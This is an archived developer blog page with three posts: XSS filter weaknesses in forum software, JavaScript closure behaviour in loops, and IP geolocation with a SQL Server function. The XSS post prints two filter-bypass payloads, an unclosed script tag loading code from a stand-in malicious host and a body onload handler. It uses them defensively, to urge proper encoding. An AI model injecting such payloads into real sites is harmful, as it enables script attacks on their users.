Site Meter
 
 

Monthly Archives: September 2007

Check your XSS filters (Cross-site scripting)

In the last couple of days I’ve tested the effectiveness of XSS filters in two different commercial forum applications, both advertised as being able to filter out malicious scripts. Neither were effectively protected against this:

<script src="http://malicious.com/script.js"

Agh! All I did was remove the tag’s closing “>” character and neither app recognised it as HTML. The latest versions of Firefox and Internet Explorer both “gracefully” interpret the malformed tag, loading and running the malicious script.

If I didn’t want to load my JS from an external file (to help hide my identity), or if they were specifically preventing the string “<script“, I could have written this:

<body onload="alert('I am evil script'); doEvilStuff();"

Browsers don’t care if you add multiple body tags. They’ll run the “onload” code for all of them.

One of the applications was supposed to filter out all HTML, full stop. Putting images in this supposed plain text was, of course, easy – just miss off the closing bracket of the <IMG> tag.

Rolling your own HTML filter

HTML filtering is hard to get right, because HTML is so permissive. Even the big webmail services occasionally admit that someone’s found a new loophole in their system.

If you can get away with simply HTML-encoding *all* user input at the point of display, do that – it’s easy and very safe, like this:

MyLabel.Text = HttpUtility.HtmlEncode(suspiciousString);

If you have a functional requirement to allow certain HTML tags, you’re going to have to consider the multitude of ways that someone can hide script in HTML.

If you’re writing .NET to parse and reformulate possibly-malformed HTML, I strongly recommend the HTML Agility Pack. It’s a Microsoft-hosted open source project that makes it a breeze to extract plain text – or whitelisted markup – from any string claiming to be HTML.

Don’t rely on some regular expression you cooked up yourself in 10 minutes. You won’t get it right.

When is a Javascript closure not really a closure?

This has frustrated me one time too many, so I’ve finally taken the time to figure it out. What should the following code do?

var closures = [];
for(var i = 0; i < 10; i++)
	closures[i] = function() { alert(i); }
closures[3]();

It alerts "3", right? Wrong. It alerts "10". It turns out that the Javascript runtime will only open one closure context per function call. So, the anonymous functions in the array all reference the same closure context, and so they're all seeing the same variable i in whatever state it's reached when they're finally invoked.

This can be a pain. Really, sometimes I want closures to wrap up the complete state of execution at the instant they're defined, particularly when defining event handlers in a loop.

You can work around it with code like this:

var closures = [];
for(var i = 0; i < 10; i++)
	closures[i] = function(i) {
				return function() { alert(i); }
			  }(i);
closures[3]();

Ta da! Now it alerts "3". All we're doing is creating a 'wrapper' anonymous function from which the real one gets returned. The act of invoking the wrapper function creates a new closure context.

Note: this isn't a bug in Javascript - it's intended behaviour. Learn more about Javascript closures

Geolocation is easier (and cheaper) than you think

Most of the time when you’re surfing the web, or creating web applications, you don’t expect real geography to be involved. Historically it’s been tricky to identify with any accuracy or reliability the physical location of your visitors, and might even be said to contravene the spirit of the web. But if what if you really do want to take action based on where they’re coming from?

I discovered today that it’s really easy. Geolocation is the term used for the conversion of an IP address to a real-world geographic location. For example:

216.239.59.103 maps to:

City Latitude Longitude
Mountain View,
California, USA
37.3956 -122.076

There are a whole bunch of companies selling geolocation services – usually either as web services, or as downloadable databases containing IP addresses and geographic data.

Free geolocation data

If you’re looking for something free, check out MaxMind GeoLite City. You can download a huge pair of CSV files (one for IP blocks, one for corresponding location data) from their website and import them into SQL Server, and you’ll end up with a schema like this:

asd

Now, there are 4 billion possible IP addresses, so rather than explicitly listing every one as a separate row (which really would hurt SQL Server) the MaxMind people have split up the IP address space into blocks which correspond to a single geographic location. To help SQL Server find which block an IP address is in, they have defined a one-to-one mapping from IP addresses to BIGINT values, as such:

A.B.C.D <=> A*256^3 + B*256^2 + C*256 + D

 

So now you can (almost) instantly obtain geographic data for any IP address by defining a SQL user defined function (UDF) such as:

CREATE FUNCTION [GetGeocodingData]
    (@a tinyint, @b tinyint, @c tinyint, @d tinyint)
RETURNS @ReturnTable TABLE (
	City VARCHAR(255),
	Region VARCHAR(255),
	Country VARCHAR(255),
	Latitude FLOAT,
	Longitude FLOAT
)
AS
BEGIN
	INSERT @ReturnTable
	SELECT 	lo.City,
		lo.Region,
		lo.Country,
		lo.Latitude,
		lo.Longitude
	FROM Blocks bl
	JOIN Locations lo on lo.LocationID = bl.LocationID
	WHERE (CAST(@a AS BIGINT)*256*256*256 + @b*256*256 + @c*256 + @d)
	  BETWEEN bl.[BlockStart] AND bl.[BlockEnd]

	RETURN
END
GO

In this example, the parameters @a, @b, @c, @d correspond to the four parts of the IP address (and should therefore be integers in the range 0-255).